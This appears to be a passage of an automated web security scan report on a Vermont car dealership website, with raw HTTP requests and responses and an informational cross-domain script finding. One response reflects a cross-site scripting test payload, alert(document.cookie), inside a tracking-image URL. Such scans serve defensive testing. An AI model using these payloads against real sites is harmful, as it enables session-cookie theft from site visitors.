Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.16.6.1302976719011

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:29 GMT
Connection: close
Cache-Control: no-store
Content-Length: 141588

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="chrome=1"/>
           

   <link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
   
   <!--
cssStack.size: 10
maxStackSize allowed: 27 (DynamicNum)
-->
       
   <link rel="stylesheet" type="text/css" media="all" href="http://static.dealer.com/v8/global/css/fonts-grids-reset.css?1272470781000" />

                               
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/js/thickbox/css/thickbox-3.1-mod.css?1233160373000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-style1.css?1302790741000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-style2.css?1299685233000" />
                                                   
   <link rel="stylesheet" type="text/css" media="print" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-print-style1.css?1228494474000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/carflix2/css/carflix2-base.css?1274989064000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/components/navigations/css/sitenav-style1.css?1270224038000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/components/footers/css/footer-style2.css?1168468901000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/templates/177/css/template.css?1300374587000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/templates/177/css/gray_black.css?1301683359000" />
                                                   
   <link rel="stylesheet" type="text/css" media="print" href="http://static.dealer.com/v8/templates/177/css/print.css?1247679150000" />
                       

                               </head>
...[SNIP]...
<div style="position:absolute;visibility:hidden;"><img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/used-inventory/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&amp;63-0=USED_INVENTORY" alt="tracking image" style="position:absolute;visibility:hidden;" /></div>
...[SNIP]...
<li>
                   <img src="http://static.dealer.com/v8/global/images/franchise/black/logo-mercedes-med.png?1294690861000" alt="mercedes" />
               </li>
...[SNIP]...
<li class="last"><a href="http://www.theautomaster.com/index.htm" rel="external"><span>
...[SNIP]...
<li class="last"><a href="http://www.theautomasterspa.com/" rel="external"><span>
...[SNIP]...
<a internallink="true" target="_self" title="undefined" href="/bbo.htm"><img src="http://pictures.dealer.com/a/automastermercedesbenz/1167/855d393240463872017414c83dbef6e5.gif" href="http://pictures.dealer.com/a/automastermercedesbenz/1167/855d393240463872017414c83dbef6e5.gif" title="230bb_Teal.gif" class="wysiwyg-image" tabindex="30000" style="height: 44px; width: 230px;"></a>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/4738/4738_cc0320_001_650.jpg" alt="2008 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This C-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WDDGF81X38F163103&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1521/thumb_54e46e7e0a0d02b7000eddacb4b3a11d.jpg" alt="2008 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This C-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WDDGF81X38F146835&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1353/thumb_5ecc58200a0d02b7002326978bc0a84b.jpg" alt="2008 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This C-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WDDGF81X48F096270&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/4738/4738_cc0320_001_723.jpg" alt="2008 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This C-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WDDGF81X78F129486&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0853/thumb_07a6d0810a0d02b701c81ac08893c5af.jpg" alt="2008 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This E-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WDBUF87X48B357018&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1789/thumb_07a003920a0d02b701c81ac0c712833b.jpg" alt="2008 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This E-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WDBUF87XX8B318207&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1077/thumb_54e7c8fa0a0d02b7000eddac3935796f.jpg" alt="2008 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This E-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WDBUF87X48B355432&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0132/thumb_4b4f2f180a0d02b7000eddac42895dde.jpg" alt="2008 Mercedes-Benz E-Class Station Wagon" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This E-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WDBUH87X08B188044&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0352/thumb_ce506f440a0d02b700731f3f001d3e3f.jpg" alt="2010 Mercedes-Benz M-Class SUV" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This M-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0479/thumb_edd04e990a0d02b7011a93102d4cc397.jpg" alt="2008 Mercedes-Benz R-Class SUV" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-mercedesbenz.gif?1195577207000" alt="This R-Class is Mercedes-Benz Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=4JGCB65E18A078853&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0825/thumb_53f30f200a0d02b7008e85b54794e9da.jpg" alt="2010 BMW 128 Coupe" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 128 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1552/thumb_757d45f60a0d02b700a8a3148e09f678.jpg" alt="2010 BMW 135 Coupe" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 135 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/autodata/us/thumb_stockphoto-color/2006/USB60BMC142A0/668.jpg" alt="2006 BMW 325 Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1562/thumb_d8d889710a0d02b700e6361ece879a21.jpg" alt="2010 BMW 328 Coupe" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 328 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WBAWC3C58AP470860&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0987/thumb_91a8d51d4046387200ad97f5d777896d.jpg" alt="2009 BMW 328 Station Wagon" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 328 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WBAUU33599A540188&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1865/thumb_d9551ee140463872008d5a9110f63570.jpg" alt="2010 BMW 328 Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 328 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WBAPK5C5XAA599771&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1205/thumb_cf31cd7e0a0d02b700e6361e505ebd3e.jpg" alt="2010 BMW 328 Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 328 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WBAPK5C50AA647861&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0730/thumb_31397e650a0d02b701b7bf860f8164e6.jpg" alt="2010 BMW 328 Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 328 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WBAPK5C50AA648203&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0937/thumb_5401165e0a0d02b7008e85b50d4e34d5.jpg" alt="2008 BMW 328 Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 328 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WBAVC93598K040101&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0039/thumb_39355b240a0d02b7008210fc14a25399.jpg" alt="2007 BMW 328 Station Wagon" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 328 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WBAVT735X7FZ36659&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1768/thumb_494b8f0a4046387201cc5d23cd21fba4.jpg" alt="2008 BMW 528 Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 528 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/4399/4399_cc0320_001_668.jpg" alt="2008 BMW 528 Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 528 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WBANV13588CZ51767&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6620/6620_cc0320_001_A68.jpg" alt="2010 BMW 535 Station Wagon" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-bmw.gif?1297367918000" alt="This 535 is BMW Certified!" />
                                                                       </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1266/thumb_4654d7ca0a0d02b700388c74f6de0c10.jpg" alt="2001 Honda Accord Sedan" />
                                           </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=1HGCG65501A023243&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0204/thumb_a62aadda0a0d02b700b87d31bd07dfb5.jpg" alt="2008 Honda Accord Coupe" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-honda.gif?1195577206000" alt="This Accord is Honda Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=1HGCS12888A003574&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1725/thumb_315a56dc0a0d02b701b7bf8615d3c802.jpg" alt="2008 Honda Accord Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-honda.gif?1195577206000" alt="This Accord is Honda Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=1HGCP26888A107743&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/autodata/us/thumb_stockphoto/2007/USB70HOC011D1.jpg" alt="2007 Honda Accord Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-honda.gif?1195577206000" alt="This Accord is Honda Certified!" />
                                                                       </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1484/thumb_781e80360a0d02b701b7bf8635f21da4.jpg" alt="2008 Honda Accord Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-honda.gif?1195577206000" alt="This Accord is Honda Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=1HGCP267X8A069701&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0316/thumb_5422c85b0a0d02b7008e85b5814dac6a.jpg" alt="2008 Honda Accord Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-honda.gif?1195577206000" alt="This Accord is Honda Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=JHMCP26748C001816&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/autodata/us/thumb_stockphoto/2008/USB80HOC011A0.jpg" alt="2008 Honda Accord Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-honda.gif?1195577206000" alt="This Accord is Honda Certified!" />
                                                                       </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/autodata/us/thumb_stockphoto/2008/USB80HOC011B1.jpg" alt="2008 Honda Accord Sedan" />
                                           </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=1HGCP26418A049875&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/1824/thumb_3161d13d0a0d02b701b7bf86b7711098.jpg" alt="2010 Honda Accord Crosstour SUV" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-honda.gif?1195577206000" alt="This Accord Crosstour is Honda Certified!" />
                                                                       </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0846/thumb_3174a50d0a0d02b701b7bf86df9b29b3.jpg" alt="2008 Porsche Boxster Convertible" />
                                           </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=WP0CB29898U731042&amp;zipcode="><span>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/autodata/us/thumb_stockphoto/2009/USB90HOC021E1.jpg" alt="2009 Honda Civic Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://pictures.dealer.com/a/automaster/0953/thumb_3165effb0a0d02b701b7bf867c70e132.jpg" alt="2008 Honda Civic Sedan" />
                                           </div>
...[SNIP]...
<div class="certified certifiedLogo">
                                                                   <img src="http://static.dealer.com/v8/global/images/franchise/black/en_US/logo-certified-honda.gif?1195577206000" alt="This Civic is Honda Certified!" />
                                                                       </div>
...[SNIP]...
<div class="carfax carfaxOneOwner">
           <a class="popup" href="http://www.carfax.com/cfm/ccc_displayhistoryrpt.cfm?partner=DLR_3&amp;vin=2HGFA165X8H302680&amp;zipcode="><span>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/js/listings.pack.js?1289418376000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/thickbox/thickbox-3.1-mod.pack.js?1253129070000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/json2.js?1215466905000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.cookie.js?1211942223000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.eventdelegation.js?1213232061000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.ondemand.pack.js?1266538091000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

5. Cross-domain script include  previous
There are 8 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /certified-inventory/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.3.8.1302976680881

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:57:45 GMT
Connection: close
Cache-Control: no-store
Content-Length: 38294

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/js/listings.pack.js?1289418376000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/thickbox/thickbox-3.1-mod.pack.js?1253129070000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/json2.js?1215466905000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.cookie.js?1211942223000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.eventdelegation.js?1213232061000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.ondemand.pack.js?1266538091000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

5.2. http://www.theautomastermercedesbenz.com/dealership/about.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /dealership/about.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dealership/about.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.30.7.1302974169538

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:15:53 GMT
Connection: close
Content-Length: 17775

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
